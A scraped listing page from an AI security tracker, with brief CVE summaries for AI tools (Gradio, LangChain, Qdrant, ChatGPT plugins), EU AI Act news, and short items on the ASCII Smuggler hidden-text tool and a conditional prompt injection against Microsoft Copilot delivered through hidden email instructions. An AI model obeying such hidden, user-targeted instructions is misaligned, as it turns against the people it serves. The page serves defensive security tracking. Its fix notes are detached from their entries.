aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

to
Export CSV
3312 items

CVE-2024-3078: A vulnerability was found in Qdrant up to 1.6.1/1.7.4/1.8.2 and classified as critical. This issue affects some unknown

mediumvulnerability
security
Mar 29, 2024
CVE-2024-3078

A critical vulnerability was discovered in Qdrant (a vector database system) versions up to 1.6.1, 1.7.4, and 1.8.2 that allows path traversal (a technique where attackers access files outside intended directories) through the Full Snapshot REST API (a web interface for creating system backups). This flaw could let attackers manipulate file paths to access unauthorized files on the system.

Fix: Upgrade to Qdrant version 1.8.3 or later. The specific patch is identified as 3ab5172e9c8f14fa1f7b24e7147eac74e2412b62.

NVD/CVE Database

CVE-2024-1729: A timing attack vulnerability exists in the gradio-app/gradio repository, specifically within the login function in rout

mediumvulnerability
security
Mar 29, 2024
CVE-2024-1729

CVE-2024-1729 is a timing attack vulnerability (where an attacker guesses a password by measuring how long the system takes to reject it) in the Gradio application's login function. The vulnerability exists because the code directly compares the entered password with the stored password using a simple equality check, which can leak information through response time differences, potentially allowing attackers to bypass authentication and gain unauthorized access.

CVE-2024-29100: Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affect

criticalvulnerability
security
Mar 28, 2024
CVE-2024-29100

CVE-2024-29100 is an unrestricted file upload vulnerability (a security flaw that allows attackers to upload harmful files without proper checks) in the Jordy Meow AI Engine: ChatGPT Chatbot plugin for WordPress, affecting versions up to 2.1.4. This vulnerability could potentially allow attackers to upload dangerous files to a website using this plugin.

CVE-2024-29090: Server-Side Request Forgery (SSRF) vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine:

mediumvulnerability
security
Mar 28, 2024
CVE-2024-29090

A server-side request forgery (SSRF, a vulnerability where an attacker tricks a server into making unintended requests to other systems) vulnerability was found in the AI Engine: ChatGPT Chatbot plugin by Jordy Meow, affecting versions up to 2.1.4. The vulnerability allows authenticated attackers to exploit the plugin to perform unauthorized requests.

CVE-2024-1540: A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due

highvulnerability
security
Mar 27, 2024
CVE-2024-1540

CVE-2024-1540 is a command injection vulnerability (a weakness where an attacker can insert malicious commands into code that gets executed) in the gradio-app/gradio repository's workflow file. Attackers could exploit this by manipulating GitHub context information within expressions to run unauthorized commands, potentially stealing secrets or modifying the repository. The vulnerability stems from unsafe handling of variables that are directly substituted into scripts before execution.

CVE-2024-2206: An SSRF vulnerability exists in the gradio-app/gradio due to insufficient validation of user-supplied URLs in the `/prox

mediumvulnerability
security
Mar 27, 2024
CVE-2024-2206

CVE-2024-2206 is an SSRF vulnerability (server-side request forgery, where an attacker tricks a server into making requests to unintended targets) in Gradio, an AI framework. Attackers can exploit this by sending specially crafted requests with an `X-Direct-Url` header to add arbitrary URLs to a list that the application uses for proxying (forwarding) requests, potentially allowing unauthorized access to internal systems. The vulnerability exists because the application does not properly validate URLs in its `build_proxy_request` function.

CVE-2024-1455: A vulnerability in the langchain-ai/langchain repository allows for a Billion Laughs Attack, a type of XML External Enti

mediumvulnerability
security
Mar 26, 2024
CVE-2024-1455

CVE-2024-1455 is a vulnerability in the langchain-ai/langchain repository that allows a Billion Laughs Attack, a type of XML External Entity (XXE) exploitation where an attacker nests multiple layers of entities within an XML document to make the parser consume excessive CPU and memory resources, causing a denial of service (DoS, where a system becomes unavailable to legitimate users).

The AI Office is hiring

inforegulatory
policy
Mar 22, 2024

The European Commission is hiring AI specialists to work in the AI Office, which will enforce the EU's AI Act by overseeing compliance of general-purpose AI models (large AI systems available to the public). The office will have real regulatory powers to require companies to implement safety measures, restrict models, or remove them from the market, and will develop evaluation tools and benchmarks to identify dangerous AI behaviors.

CVE-2024-1727: A Cross-Site Request Forgery (CSRF) vulnerability in gradio-app/gradio allows attackers to upload multiple large files t

mediumvulnerability
security
Mar 21, 2024
CVE-2024-1727

CVE-2024-1727 is a CSRF vulnerability (cross-site request forgery, where an attacker tricks a victim into making unintended requests) in Gradio that lets attackers upload large files to a victim's computer without permission. An attacker can create a malicious webpage that, when visited, automatically uploads files to the victim's system, potentially filling up their disk space and causing a denial of service (making the system unusable).

The AI Office: What is it, and how does it work?

inforegulatory
policy
Mar 21, 2024

The European AI Office is a new EU regulator created to oversee general purpose AI (GPAI) models and systems, which are AI systems designed to perform a wide range of tasks, across all 27 EU Member States under the AI Act. It monitors compliance, analyzes emerging risks, develops evaluation capabilities, produces voluntary codes of practice for companies to follow, and coordinates enforcement between national regulators and international partners. The Office also supports small and medium businesses with compliance resources and oversees regulatory sandboxes, which are controlled environments where companies can test AI systems before full deployment.

CVE-2024-29037: datahub-helm provides the Kubernetes Helm charts for deploying Datahub and its dependencies on a Kubernetes cluster. Sta

criticalvulnerability
security
Mar 20, 2024
CVE-2024-29037

A vulnerability in datahub-helm (Helm charts, which are templates for deploying applications on Kubernetes clusters) versions 0.1.143 through 0.2.181 allowed personal access tokens (credentials that grant access to the system) to be created using a publicly known default secret key instead of a random one. This meant attackers could potentially generate their own valid tokens to access DataHub instances if Metadata Service Authentication (a security feature) was enabled during a specific vulnerable time period.

CVE-2024-29018: Moby is an open source container framework that is a key component of Docker Engine, Docker Desktop, and other distribut

mediumvulnerability
security
Mar 20, 2024
CVE-2024-29018

Moby (the container framework underlying Docker) has a bug in how it handles DNS requests from internal networks (networks isolated from external communication). When a container on an internal network needs to resolve a domain name, Moby forwards the request through the host's network namespace instead of the container's own network, which can leak data to external servers that an attacker controls. Docker Desktop is not affected by this issue.

CVE-2023-49785: NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT. Versions 2.11.2

criticalvulnerability
security
Mar 12, 2024
CVE-2023-49785EPSS: 92.6%

NextChat (also called ChatGPT-Next-Web) version 2.11.2 and earlier has two security flaws: SSRF (server-side request forgery, where attackers trick the server into making unwanted requests) and XSS (cross-site scripting, where attackers inject malicious code into web pages). These flaws let attackers read internal server data, make changes to it, hide their location by routing traffic through the app, or attack other targets on the internet.

CVE-2024-2363: ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in AOL AIM Triton 1.0.4. It has been declared as problematic.

mediumvulnerability
security
Mar 10, 2024
CVE-2024-2363

A vulnerability was found in AOL AIM Triton 1.0.4 that allows remote attackers to cause a denial of service (making a service unavailable by overloading it) by manipulating the CSeq argument in the Invite Handler component. The vulnerability is now public knowledge and only affects this outdated, unsupported software version.

CVE-2024-27565: A Server-Side Request Forgery (SSRF) in weixin.php of ChatGPT-wechat-personal commit a0857f6 allows attackers to force t

criticalvulnerability
security
Mar 5, 2024
CVE-2024-27565

CVE-2024-27565 is a server-side request forgery (SSRF, a flaw that allows attackers to trick a server into making unwanted requests to other systems) vulnerability found in the weixin.php file of ChatGPT-wechat-personal at commit a0857f6. This vulnerability lets attackers force the application to make arbitrary requests on their behalf. The vulnerability has a CVSS 4.0 severity rating (a moderate score on a 0-10 scale measuring how serious a security flaw is).

ASCII Smuggler - Improvements

infonews
security
Mar 4, 2024

ASCII Smuggler is a tool that hides text within regular content using Unicode characters, and this update adds new features like optional rendering of Unicode Tags (special markers that show where hidden text begins and ends), URL decoding of input, flexible output modes to either highlight or isolate hidden text, and improved mobile compatibility with a better user interface.

CVE-2024-28088: LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path pa

highvulnerability
security
Mar 4, 2024
CVE-2024-28088EPSS: 10.7%

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot

mediumnews
securityresearch

CVE-2024-2057: A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the f

mediumvulnerability
security
Mar 1, 2024
CVE-2024-2057

A critical vulnerability was found in LangChain's langchain_community library version 0.0.26 in the TFIDFRetriever component (a tool that retrieves relevant documents for AI systems). The flaw allows server-side request forgery (SSRF, where an attacker tricks a server into making unwanted network requests on their behalf), and it can be exploited remotely.

AI Act Implementation: Timelines & Next steps

inforegulatory
policy
Feb 28, 2024

The EU AI Act is a regulatory framework that requires companies to comply with rules for different types of AI systems on specific timelines, starting with prohibitions on the riskiest AI uses within 6 months and expanding to cover high-risk AI systems (such as those used in law enforcement, hiring, or education) by 24 months after the law takes effect. The article outlines key compliance deadlines, secondary laws the EU Commission might create to clarify the rules, and guidance documents to help organizations understand how to follow the AI Act.

Previous120 / 166Next

Fix: A patch is available at https://github.com/gradio-app/gradio/commit/e329f1fd38935213fe0e73962e8cbd5d3af6e87b. Additionally, a bounty reference with more details is provided at https://huntr.com/bounties/f6a10a8d-f538-4cb7-9bb2-85d9f5708124.

NVD/CVE Database
NVD/CVE Database
NVD/CVE Database

Fix: Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.

NVD/CVE Database
NVD/CVE Database

Fix: A patch is available at https://github.com/langchain-ai/langchain/commit/727d5023ce88e18e3074ef620a98137d26ff92a3

NVD/CVE Database
EU AI Act Updates

Fix: A patch is available at https://github.com/gradio-app/gradio/commit/84802ee6a4806c25287344dce581f9548a99834a

NVD/CVE Database
EU AI Act Updates

Fix: Update to version 0.2.182, which contains a patch for this issue. As a workaround, reset the token signing key to be a random value, which will invalidate active personal access tokens.

NVD/CVE Database

Fix: Moby releases 26.0.0, 25.0.4, and 23.0.11 are patched to prevent forwarding any DNS requests from internal networks. As a workaround, run containers intended to be solely attached to internal networks with a custom upstream address, which will force all upstream DNS queries to be resolved from the container's network namespace.

NVD/CVE Database

Fix: According to the source: "Users may avoid exposing the application to the public internet or, if exposing the application to the internet, ensure it is an isolated network with no access to any other internal resources." The source also notes that as of publication, no patch is available.

NVD/CVE Database
NVD/CVE Database
NVD/CVE Database
Embrace The Red

LangChain versions up to 0.1.10 have a path traversal vulnerability (a flaw where an attacker can use ../ sequences to access files outside the intended directory) that allows someone controlling part of a file path to load configurations from anywhere instead of just the intended GitHub repository, potentially exposing API keys or enabling remote code execution (running malicious commands on a system). This bug affects how the load_chain function handles file paths.

Fix: A patch is available in langchain-core version 0.1.29 and later. Update to this version or newer to fix the vulnerability.

NVD/CVE Database
Mar 3, 2024

Attackers can create conditional prompt injection attacks (tricking an AI by hiding malicious instructions in its input that activate only for specific users) against Microsoft Copilot by leveraging user identity information like names and job titles that the AI includes in its context. A researcher demonstrated this by sending an email with hidden instructions that made Copilot behave differently depending on which person opened it, showing that LLM applications become more vulnerable as attackers learn to target specific users rather than all users equally.

Embrace The Red

Fix: Upgrading to version 0.0.27 addresses this issue.

NVD/CVE Database
EU AI Act Updates